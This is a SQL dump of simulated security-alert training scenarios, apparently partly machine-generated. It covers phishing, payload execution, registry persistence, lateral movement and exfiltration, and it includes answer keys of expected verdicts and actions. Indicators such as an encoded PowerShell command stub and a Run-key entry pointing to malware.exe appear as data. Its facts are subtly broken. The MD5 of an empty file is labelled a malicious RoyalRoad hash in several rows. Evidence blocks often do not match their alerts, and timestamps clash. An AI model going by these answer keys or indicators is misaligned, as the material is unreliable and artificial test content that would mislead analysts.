INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1273, 'Unusual File Access Pattern Detected', 'high', 'Forcepoint', 'A user accessed an unusually high number of sensitive files in a short period, potentially indicating data exfiltration.', 'Data Exfil', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T13:45:20Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.10.45\",\"dst_ip\":null,\"username\":\"linda.lee\",\"hostname\":\"CORP-DESK-09\",\"request_body\":null,\"command_line\":\"ls -lh /sensitive/data/*\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP exhibiting unusual file access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"ls -lh /sensitive/data/*\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command pattern indicative of data enumeration\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The high-volume access to sensitive files suggests a potential data exfiltration attempt.\"}', 'Intermediate', 'DLP', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.721Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T13:45:20Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.10.45\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"linda.lee\\\",\\\"hostname\\\":\\\"CORP-DESK-09\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"ls -lh /sensitive/data/*\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1274, 'Suspicious Domain Lookup Detected', 'medium', 'Microsoft Purview', 'A system on the network attempted to resolve a domain known for hosting phishing campaigns.', 'Phishing', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T06:15:45Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.11.20\",\"dst_ip\":null,\"username\":\"unknown\",\"hostname\":\"CORP-DNS-01\",\"request_body\":null,\"command_line\":\"nslookup phishing-site.com\"}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.11.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal DNS server performing suspicious lookup\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"phishing-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing activity\"}}],\"expected_actions\":[\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The domain lookup indicates potential communication with a phishing server.\"}', 'Intermediate', 'DLP', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.722Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T06:15:45Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.11.20\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-DNS-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nslookup phishing-site.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1275, 'Suspicious Email with Malicious RTF Attachment', 'high', 'Email Gateway Logs', 'A phishing email targeting government officials was detected. The email contains a RoyalRoad RTF attachment designed to exploit vulnerabilities and deliver the initial payload. This is a part of an ongoing campaign.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:07Z\",\"email_id\":\"1234567890\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"official@govdomain.gov\",\"subject\":\"Urgent: Please Review the Attached Document\",\"attachment_name\":\"RoyalRoad_Exploit.rtf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"185.83.214.247\",\"destination_ip\":\"192.168.1.25\",\"user_agent\":\"Thunderbird/78.10.2\",\"malware_signature\":\"RoyalRoad\",\"internal_ip\":\"10.0.0.5\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known malicious campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.83.214.247\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatCrowd\",\"verdict\":\"malicious\",\"details\":\"IP belongs to an APT group known for phishing attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RoyalRoad_Exploit.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malpedia\",\"verdict\":\"malicious\",\"details\":\"Known RTF document used in targeted attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"HybridAnalysis\",\"verdict\":\"malicious\",\"details\":\"Hash matches RoyalRoad exploit document.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted recipient.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious RTF Attachment\",\"date\":\"2026-02-24T04:22:04.724Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1276, 'Execution of Malicious Payload via Soul Framework', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The EDR system detected the execution of a malicious payload via the Soul Framework. The payload was executed following the opening of a weaponized RTF document, which utilized the RoyalRoad RTF weaponizer. The Soul framework is now attempting to establish a foothold within the network.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_type\":\"process_creation\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"document_reader.exe\",\"file_hash\":\"3a5f4d6e7c8b9a0d1234567890abcdef\",\"username\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice_2023.doc\",\"malware_name\":\"Soul Framework\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"ip\",\"value\":\"192.168.1.15\"},{\"type\":\"hash\",\"value\":\"3a5f4d6e7c8b9a0d1234567890abcdef\"},{\"type\":\"filename\",\"value\":\"invoice_2023.doc\"}]}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known attack infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint affected by the payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a5f4d6e7c8b9a0d1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious Soul framework payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Engine\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1277, 'Establishing Persistence through Registry Modification', 'high', 'Windows Registry Monitoring', 'To maintain access, attackers modify registry keys, ensuring malware persists even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4657\",\"computer_name\":\"WIN-02Q3X1YJ4A5\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousStartup\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malware.exe\\\"\",\"user\":\"malicious_user\",\"process_id\":4321,\"process_name\":\"regedit.exe\",\"source_ip\":\"192.168.0.24\",\"attacker_ip\":\"203.0.113.54\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.54\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with persistent attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variant.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in the organization\'s user directory.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"4657\\\",\\\"computer_name\\\":\\\"WIN-02Q3X1YJ4A5\\\",\\\"registry_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malware.exe\\\\\\\"\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"process_id\\\":4321,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"192.168.0.24\\\",\\\"attacker_ip\\\":\\\"203.0.113.54\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1278, 'Unauthorized Access to Sensitive Internal Systems', 'high', 'Network Traffic Analysis', 'Utilizing credentials harvested from compromised systems, the attackers move laterally across the network to access sensitive internal systems and gather intelligence. Detected unusual login activity from a potentially compromised external IP address.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:22:34Z\",\"event_type\":\"authentication_success\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.25\",\"username\":\"jdoe\",\"auth_method\":\"NTLM\",\"event_id\":\"4624\",\"logon_type\":\"3\",\"account_domain\":\"CORP\",\"logon_process\":\"NtLmSsp\",\"logon_status\":\"Success\",\"related_file\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"Successful login detected from a known suspicious IP address using legitimate credentials.\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious login activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1279, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Tools', 'In the final stage of the espionage operation, sensitive data is exfiltrated through encrypted channels to evade detection. An internal host is communicating with an external malicious IP, transferring sensitive files named \'confidential_report.pdf\' and \'financial_data.xlsx\'.', 'Data Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"10.0.1.25\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"files_transferred\":[{\"filename\":\"confidential_report.pdf\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"filename\":\"financial_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}],\"user\":\"jdoe\",\"encryption\":\"TLSv1.2\",\"status\":\"Success\",\"alert\":\"Data Exfiltration Detected\"}', '2026-02-24 03:13:51', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in the exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being exfiltrated.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file being exfiltrated.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account associated with data transfer.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 